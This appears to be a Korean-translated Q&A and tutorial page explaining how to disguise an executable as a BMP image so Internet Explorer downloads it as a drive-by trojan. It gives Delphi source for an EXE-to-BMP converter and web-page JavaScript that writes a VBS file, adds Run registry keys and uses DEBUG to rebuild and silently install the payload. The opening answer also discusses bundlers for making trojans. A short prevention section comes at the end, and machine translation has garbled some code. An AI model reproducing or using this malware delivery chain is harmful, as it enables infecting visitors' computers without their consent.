기금넷 공식사이트 - 경제 뉴스 - 트로이 목마를 bmp 확장자로 변환하는 데 어떤 번들러를 사용할 수 있나요?
트로이 목마를 bmp 확장자로 변환하는 데 어떤 번들러를 사용할 수 있나요?
어떤 종류의 트로이목마를 만드느냐에 따라 달라집니다!
내가 사용한 번들러는 사용하기 매우 쉽습니다. 다른 번들러를 사용해도 됩니다.
EXE 파일은 WINARA를 이용해서 압축해서 자동추출형으로 합성한건데 QQ를 통해서 전송도 되고~패킹도 가능해요~
BMP 웹트로이목마에 대한 자세한 설명
먼저 우선 이것이 아닌 것을 설명해 보겠습니다. 새로운 것인데 최근 누군가가 우리에게 없다고 해서 그냥 글을 써서 모두가 시험해 볼 수 있도록 올렸습니다. BMP 웹 트로이 목마란 무엇입니까? MIME 트로이목마는 기존에 오랫동안 사용되었던 MIME 헤더 취약점을 이용한 트로이목마와는 다릅니다. MIME 트로이목마는 EXE 파일을 EML(OUT LOOK 문자) 파일로 인코딩하여 웹페이지에 올려 사용하는 것입니다. IE와 OE의 인코딩 취약점을 이용해 자동 다운로드 및 실행을 구현합니다.
그러나 BMP 트로이 목마는 EXE 파일을 BMP 이미지 파일로 위장하여 IE를 속여 자동으로 다운로드하도록 합니다. 그런 다음 웹 페이지에서 JAVASCRIPT 스크립트를 사용하여 클라이언트의 임시 인터넷 폴더를 찾고, 다운로드한 BMP 파일을 찾아 TEMP 디렉터리에 복사합니다. 그런 다음 찾은 파일을 복사하는 스크립트를 작성합니다. DEBUG를 사용하여 BMP 파일을 EXE로 복원합니다. , 다음 부팅 시 실행되도록 레지스트리 시작 항목에 넣습니다. 그러나 이 기술은 9X에서만 작동할 수 있으며 2K 및 XP에서는 무력합니다.
매우 복잡해 보입니다. 단계별로 살펴보세요:
1) EXE를 BMP로 변환하는 방법
BMP 파일 정보를 직접 확인하면 알 수 있습니다. 간단히 말해 BMP 파일의 길이, 너비, 비트 수, 파일 크기 및 데이터 영역 길이가 포함됩니다. EXE 파일의 파일 헤더 앞에 해당 BMP 파일 헤더만 추가하면 됩니다. 물론 BMP 파일 헤더의 데이터는 EXE 파일의 크기와 일치해야 합니다. 그래야 IE가 BMP 파일을 다운로드하도록 속일 수 있습니다. 처음에는 JPG 파일로 실험을 한 결과 파일 헤더가 잘못된 경우를 발견했습니다. , IE에서는 다운로드하지 않습니다.
program exe2bmp;
사용
Windows,
SysUtils;
var len, row,col,fs: DWORD;
버퍼: 문자 배열[0..255];
fd: WIN32_FIND_DATA; p>
h,hw: THandle ;
시작
if (ParamStr(1)<>'') and(ParamStr(2)<>'') then start //Exit 실행 후 두 개의 매개변수가 없으면
if FileExists(ParamStr(1)) 시작
FindFirstFile(Pchar(ParamStr(1)),fd); p>
fs:=fd.nFileSizeLow;
col := 4;
true인 동안 시작
if (fs mod 12)=0 그런 다음 시작
len :=fs;
end else len:=fs+12-(fs mod 12);
row := len div col div 3;
if row>col then start
col:=col+4;
end else Break;
end;
FillChar(buffer, 256,0);
{다음은 BMP 파일 헤더 데이터입니다}
Buffer[0]:='B'
;Buffer[1]:='M';
PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=row ;
PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;
PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;
PWORD(@buffer[26])^: =1;
PWORD(@buffer[28])^:=24;
{파일 쓰기}
hw:=CreateFile(Pchar(ParamStr ( 2)),GENERIC_WRITE,FILE_SHARE_READ 또는 FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ 또는 FILE_SHARE_WRITE,nil,OPEN_EXISTING, 0 ,0);
WriteFile(hw,buffer,54,col,0);
반복
ReadFile(h,buffer,256,col, 0 );
WriteFile(hw,buffer,col,col,0);
Untilcol<>256;
WriteFile(hw,buffer,len- fs ,col,0);
CloseHandle(h);
CloseHandle(hw);
end;
end;< / p>
end.
위 코드는 DELPHI4, 5, 6에서 컴파일 가능하며, MSDOS 모드를 열고
exe2bmp myexe.exe mybmp.bmp
Enter를 눌러 두 번째 매개변수에 지정된 EXE 파일을 BMP 형식으로 변환합니다.
그러면 BMP 이미지가 웹페이지에 배치됩니다. 이 사진을 열었다면 이 BMP가 꽃무늬이고 색상이 단조롭다는 것을 알았을 것입니다. 따라서 웹페이지에 배치할 때 이 형식을 사용하는 것이 가장 좋습니다.
다음은 배치된 스크립트입니다. 웹페이지에서
document.write(' ');
함수 docsave()
{
a=document.applet[ 0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh =a.GetObject ();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso =a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite
('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \\vbs','wscript '+'"'+vbs+'" ');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine(' Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject"" )');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU \\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft \\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\ \tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder, File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(폴더) & "\\" & 폴더.이름 & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)' );
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine('
Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("0")');
st.WriteLine(' Lt.WriteLine( "rcx")');
st.WriteLine(' Lt.WriteLine("1000")');
st.WriteLine(' Lt.WriteLine("w136") ');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "명령 /c 디버그 " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6'); p>
st.WriteLine(' 오류 시 다음 재개 ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe ")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile( tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st .WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' 각 하위 폴더에 대해 Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st. WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);
스크립트를 "js.js"로 저장하고 웹페이지에 삽입하세요.
이 스크립트는 주로 다음과 같습니다. 로컬로 사용 "S.VBS" 파일은 컴퓨터의 SYSTEM 디렉터리에 생성되며 다음에 컴퓨터를 켤 때 스크립트 파일이 자동으로 실행됩니다. 주로 임시 디렉터리에서 mybmp[1].bmp 파일을 찾는 데 사용됩니다.
"S.VBS" 파일의 주요 내용은 다음과 같습니다:
Option Explicit
Dim FSO,WSH,CACHE,str
FSO 설정 = CreateObject("Scripting.FileSystemObject")
WSH 설정 = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\ Microsoft\Windows\CurrentVersion \Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\ Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit( )
함수 SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
'대상 BMP 그림 찾기 임시 폴더에서
str=FSO.GetParentFolderName(folder) & "\" &folder.name & "\" & fname
if FSO.FileExists(str) then
p>tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile( str)
File.Copy(tmp & "tmp.dat")
File.Delete
'DEBUG 스크립트 생성
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine ("rcx")
다음 줄의 '1000은 16진수이며, 10진수로 변환하면 4096입니다(이 숫자는 EXE 파일의 크기입니다)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
p>WSH."command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6 실행
오류 발생 시 다음 재개
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp .dat") .삭제
FSO.G
etFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 그러면
Folder.SubFolders의 각 하위 폴더에 대해
SearchBMPFile SubFolder,fname
다음
End
기능 종료
이 스크립트는 임시 폴더에서 bmp 파일을 찾아 DEBUG 스크립트를 생성합니다. 데이터를 제거할 때 BMP 파일에서 54바이트를 자동으로 읽습니다. 지정한 크기의 파일을 tmp.dat에 저장합니다. 후속 스크립트는 이를 SYSTEM 디렉터리에 복사합니다. 이는 다음에 다시 시작할 때 실행됩니다.
자세한 스크립트 코드는 _blank href=>
를 참조하세요.예방 방법:
가장 간단한 방법은 wscrpit.exe 파일과 DEBUG 파일을 삭제하거나 이름을 바꾸는 것입니다.
많은 바이러스 백신 소프트웨어가 이러한 스크립트를 탐지할 수 있으므로 효과적인 바이러스 백신 소프트웨어를 설치하십시오.
조건이 허락한다면 WIN2K SP3을 설치하고 출처를 알 수 없는 웹사이트로 이동하지 마십시오.
- 관련 기사
- 중국 인민해방군 영웅 100인을 긴급 구합니다! 중국 해군의 영웅 100인!
- Tianzi의 매력적인 소설 Luo Yan Liu Yang의 결말
- 3 1 2 새로운 대학 입시 개혁 모델과 변함없는 모델의 차이점은 무엇인가요?
- 17세에 일본 유학을 가게 되고, 18세에 혈관종, 34세에 갑상선암을 앓게 됩니다. 주쉰은 어떤 일을 겪었나요?
- Bloody Solitary Language의 무료 리소스를 보유한 사람은 누구인가요?
- '산강은 안전하다' 전체 시는 무엇인가요?
- 인터넷의 기억이 사라졌습니다. 한조포레스트는 왜 텐센트 광고를 받을 수 있나요?
- Tian Tian Shang Shang 행복캠프 2화 중 어떤 호가 가장 재미있나요?
- 양력은 양력인가요, 음력인가요? 양력과 음력을 어떻게 구별하나요?
- 횡단 시 보행자가 주의해야 할 안전 상식은 무엇인가요?(목록)